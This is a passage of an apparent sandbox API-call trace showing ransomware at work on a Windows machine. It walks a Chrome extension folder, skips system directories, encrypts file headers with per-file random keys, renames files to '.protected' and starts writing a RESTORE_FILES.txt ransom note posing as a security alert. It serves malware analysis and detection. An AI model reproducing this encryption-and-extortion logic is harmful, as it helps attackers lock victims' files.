HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html") returned 139 [0079.978] StrStrW (lpFirst="main.html", lpSrch=".rar") returned 0x0 [0079.978] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html") returned 139 [0079.978] StrStrW (lpFirst="main.html", lpSrch=".zip") returned 0x0 [0079.978] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, 
lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x5c, lpOverlapped=0x0) returned 1 [0079.979] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffffa4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.979] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5c, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x5c, lpOverlapped=0x0) returned 1 [0079.979] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.979] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0079.979] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0079.979] CloseHandle (hObject=0x160) returned 1 [0079.979] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.protected") returned 149 [0079.979] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.protected")) returned 1 [0079.980] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.980] lstrcmpiW (lpString1="main.js", lpString2="Windows") returned -1 [0079.980] lstrcmpiW (lpString1="main.js", lpString2="Program Files") returned -1 [0079.980] lstrcmpiW (lpString1="main.js", lpString2="Program Files (x86)") returned -1 [0079.980] lstrcmpiW (lpString1="main.js", lpString2="$Recycle.bin") returned 1 [0079.980] lstrcmpiW (lpString1="main.js", lpString2="System Volume Information") returned -1 [0079.980] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js") returned 137 [0079.980] StrStrIW (lpFirst="main.js", lpSrch=".protected") returned 0x0 [0079.980] lstrcmpW (lpString1="main.js", lpString2="RESTORE_FILES.txt") returned -1 [0079.980] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0079.980] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0079.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.981] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js") returned 137 [0079.981] StrStrW (lpFirst="main.js", lpSrch=".txt") returned 0x0 [0079.981] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js") returned 137 [0079.981] StrStrW (lpFirst="main.js", lpSrch=".rar") returned 0x0 [0079.981] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js") returned 137 [0079.981] StrStrW (lpFirst="main.js", lpSrch=".zip") returned 0x0 [0079.981] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x5f, lpOverlapped=0x0) returned 1 [0079.981] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffffa1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.981] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x5f, lpOverlapped=0x0) returned 1 [0079.981] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.982] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0079.982] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0079.982] CloseHandle (hObject=0x160) returned 1 [0079.982] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.protected") returned 147 [0079.982] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.protected")) returned 1 [0079.982] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.982] lstrcmpiW (lpString1="manifest.json", lpString2="Windows") returned -1 [0079.982] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files") returned -1 [0079.982] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files (x86)") returned -1 [0079.982] lstrcmpiW (lpString1="manifest.json", lpString2="$Recycle.bin") returned 1 [0079.982] lstrcmpiW (lpString1="manifest.json", lpString2="System Volume Information") returned -1 [0079.982] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json") returned 143 [0079.982] StrStrIW (lpFirst="manifest.json", lpSrch=".protected") returned 0x0 [0079.982] lstrcmpW (lpString1="manifest.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.982] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0079.982] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0079.983] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.983] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json") returned 143 [0079.983] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0079.983] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json") returned 143 [0079.983] StrStrW (lpFirst="manifest.json", lpSrch=".rar") returned 0x0 [0079.983] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json") returned 143 [0079.983] StrStrW (lpFirst="manifest.json", lpSrch=".zip") returned 0x0 [0079.983] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2d6, lpOverlapped=0x0) returned 1 [0079.993] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffffd2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.993] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2d6, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2d6, lpOverlapped=0x0) returned 1 [0079.993] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.993] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0079.993] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0079.993] CloseHandle (hObject=0x160) returned 1 [0079.993] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.protected") returned 153 [0079.993] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.protected")) returned 1 [0079.994] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.994] lstrcmpiW (lpString1="_locales", lpString2="Windows") returned -1 [0079.994] lstrcmpiW (lpString1="_locales", lpString2="Program Files") returned -1 [0079.994] lstrcmpiW (lpString1="_locales", lpString2="Program Files (x86)") returned -1 [0079.994] lstrcmpiW (lpString1="_locales", lpString2="$Recycle.bin") returned 1 [0079.994] lstrcmpiW (lpString1="_locales", lpString2="System Volume Information") returned -1 [0079.994] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales") returned 138 [0079.994] lstrcmpW (lpString1="_locales", lpString2=".") returned 1 [0079.994] lstrcmpW (lpString1="_locales", lpString2="..") returned 1 [0079.994] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\*") returned 140 [0079.994] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0079.995] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.995] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.995] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 
[0079.995] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.996] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.996] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\.") returned 140 [0079.996] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.996] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.996] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.996] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.996] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.996] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.996] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.996] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\..") returned 141 [0079.996] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.996] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.996] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.996] lstrcmpiW (lpString1="ar", lpString2="Windows") returned -1 [0079.996] lstrcmpiW (lpString1="ar", lpString2="Program Files") returned -1 [0079.996] lstrcmpiW (lpString1="ar", lpString2="Program Files (x86)") returned -1 [0079.996] lstrcmpiW (lpString1="ar", lpString2="$Recycle.bin") returned 1 [0079.996] lstrcmpiW (lpString1="ar", lpString2="System Volume Information") returned -1 [0079.996] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar") returned 141 [0079.996] lstrcmpW (lpString1="ar", lpString2=".") returned 1 [0079.996] lstrcmpW (lpString1="ar", lpString2="..") returned 1 [0079.996] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\*") returned 143 [0079.996] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.996] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.996] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.996] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.996] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.996] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.996] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\.") returned 143 [0079.996] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.997] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.997] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.997] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.997] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.997] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") 
returned 1 [0079.997] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.997] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\..") returned 144 [0079.997] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.997] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.997] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.997] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.997] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.997] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.997] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.997] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.997] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json") returned 155 [0079.997] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.997] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.997] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.997] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.998] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json") returned 155 [0079.998] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.998] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json") returned 155 [0079.998] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.998] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json") returned 155 [0079.998] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.998] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xfe, lpOverlapped=0x0) returned 1 [0079.999] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.999] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xfe, lpOverlapped=0x0) returned 1 [0079.999] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.999] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.999] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.000] CloseHandle (hObject=0x168) returned 1 [0080.000] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.protected") returned 165 [0080.000] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.protected")) returned 1 [0080.001] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.001] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.001] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\RESTORE_FILES.txt") returned 159 [0080.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.001] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in 